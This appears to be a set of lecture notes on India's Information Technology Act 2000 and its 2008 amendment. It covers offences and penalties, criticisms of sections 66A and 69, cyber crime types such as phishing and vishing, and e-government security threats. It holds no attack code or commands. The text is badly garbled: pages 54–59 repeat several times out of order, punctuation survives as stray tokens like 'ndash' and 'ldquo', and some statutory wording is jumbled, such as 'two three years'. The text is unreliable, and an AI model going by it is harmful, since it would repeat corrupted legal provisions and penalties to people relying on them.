PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
